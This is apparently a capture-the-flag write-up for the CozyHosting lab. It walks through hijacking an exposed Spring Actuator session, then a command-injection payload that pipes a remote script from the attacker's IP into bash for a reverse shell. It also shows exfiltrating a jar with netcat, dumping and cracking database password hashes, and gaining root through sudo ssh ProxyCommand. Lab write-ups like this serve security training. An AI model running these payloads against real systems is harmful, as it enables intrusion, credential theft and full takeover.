CozyHosting
Recon
HTTP (80)
Standard landing page, with login
From the error the backend should be Spring Boot Framework, Java
└─$ feroxbuster -u 'http://cozyhosting.htb/' -w /usr/share/seclists/Discovery/Web-Content/common.txt
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/logo.png
200 GET 43l 241w 19406c http://cozyhosting.htb/assets/img/pricing-business.png
200 GET 29l 174w 14774c http://cozyhosting.htb/assets/img/pricing-ultimate.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/favicon.png
200 GET 81l 517w 40968c http://cozyhosting.htb/assets/img/hero-img.png
200 GET 29l 131w 11970c http://cozyhosting.htb/assets/img/pricing-free.png
200 GET 295l 641w 6890c http://cozyhosting.htb/assets/js/main.js
200 GET 1l 313w 14690c http://cozyhosting.htb/assets/vendor/aos/aos.js
200 GET 97l 196w 4431c http://cozyhosting.htb/login
200 GET 73l 470w 37464c http://cozyhosting.htb/assets/img/values-1.png
200 GET 1l 625w 55880c http://cozyhosting.htb/assets/vendor/glightbox/js/glightbox.min.js
200 GET 34l 172w 14934c http://cozyhosting.htb/assets/img/pricing-starter.png
200 GET 79l 519w 40905c http://cozyhosting.htb/assets/img/values-2.png
200 GET 1l 218w 26053c http://cozyhosting.htb/assets/vendor/aos/aos.css
200 GET 83l 453w 36234c http://cozyhosting.htb/assets/img/values-3.png
200 GET 2397l 4846w 42231c http://cozyhosting.htb/assets/css/style.css
200 GET 7l 1222w 80420c http://cozyhosting.htb/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200 GET 2018l 10020w 95609c http://cozyhosting.htb/assets/vendor/bootstrap-icons/bootstrap-icons.css
200 GET 7l 2189w 194901c http://cozyhosting.htb/assets/vendor/bootstrap/css/bootstrap.min.css
200 GET 14l 1684w 143706c http://cozyhosting.htb/assets/vendor/swiper/swiper-bundle.min.js
200 GET 285l 745w 12706c http://cozyhosting.htb/
401 GET 1l 1w 97c http://cozyhosting.htb/admin
500 GET 1l 1w 73c http://cozyhosting.htb/error
200 GET 285l 745w 12706c http://cozyhosting.htb/index
204 GET 0l 0w 0c http://cozyhosting.htb/logout
[####################] - 23s 4763/4763 0s found:26 errors:0
[####################] - 22s 4728/4728 211/s http://cozyhosting.htb/Spring Actuator is debugging tool implemented in Spring Boot, which shouldn't be used in prod.https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/spring-actuators
http://cozyhosting.htb/actuator/env - validate that endpoint exists. Not useful information, but endpoint existing means exploit vector exists too.
└─$ curl http://cozyhosting.htb/actuator/mappings -s | jq '.contexts.application.mappings.dispatcherServlets.dispatcherServlet[].predicate'
"{GET [/actuator/env/{toMatch}], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/env], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/beans], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/mappings], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/health/**], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/health], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{GET [/actuator/sessions], produces [application/vnd.spring-boot.actuator.v3+json || application/vnd.spring-boot.actuator.v2+json || application/json]}"
"{ [/error], produces [text/html]}"
"{POST [/executessh]}"
"{ [/error]}"
"/admin"
"/addhost"
"/index"
"/login"
"/webjars/**"
"/**"sessions is unusual endpoint
└─$ curl http://cozyhosting.htb/actuator/sessions -s | jq
{
"8EE773FBF5B5DF2599C64F9D3A041B24": "kanderson",
"9EA5C959E316A20A75099C5FA20441E3": "UNAUTHORIZED"
}Looks like we can login with the cookies. We already have JSESSIONID cookie (second one is us), modify it with kanderson cookie and go to /admin
Command injection is successful inside the Username, username can't contain whitespaces and hostname should be valid?
There's a weird command injection tho, curl IP|bash didn't work, but sh worked without reverse shell...
LFI is possible (partially)
We can also leak the command with more semicolons.
host=x&username=;;{curl,-h};
Location: http://cozyhosting.htb/admin?error=/bin/bash: -c: line 1: syntax error near unexpected token `;;'/bin/bash: -c: line 1: `ssh -o ConnectTimeout=1 ;;{curl,-h};@x'Revshell was possible with this type of chain:
host=x&username=;curl${IFS}10.10.14.42/rev|bash;Download the server jar file
└─$ listen > cloudhosting-0.0.1.jar
---
$ busybox nc 10.10.14.42 4444 < /app/cloudhosting-0.0.1.jarUse jd-gui to decompile the jar file.
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxRPGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost -p 5432 -d cozyhosting -c '\dt'
$ PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost -p 5432 -c '\l'
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
$ PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost -p 5432 -d cozyhosting -c '\dt'
List of relations
Schema | Name | Type | Owner
--------+-------+-------+----------
public | hosts | table | postgres
public | users | table | postgres
$ PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost -p 5432 -d cozyhosting -c 'SELECT * FROM users;'
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | AdminCrack the password for admin
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)
1g 0:00:00:23 DONE (2024-11-24 20:39) 0.04219g/s 118.4p/s 118.4c/s 118.4C/s onlyme..keyboard
Use the "--show" option to display all of the cracked passwords reliably
Session completedSSH (22)
Josh is the only user on box, so he's probably admin. SSH is successful.
Creds:
josh:manchesterunited
└─$ sshpass -p 'manchesterunited' ssh josh@cozyhosting.htb
josh@cozyhosting:~$ id
uid=1003(josh) gid=1003(josh) groups=1003(josh)User.txt
josh@cozyhosting:~$ cat user.txt
92f667a3c4b19fd327f7c82bbba9755bPrivilege Escalation
josh@cozyhosting:~$ sudo -l
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *https://gtfobins.github.io/gtfobins/ssh/
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)Root.txt
# cd
# cat root.txt
b1dcd5867d771d9f5042edb0fd04a4d9Last updated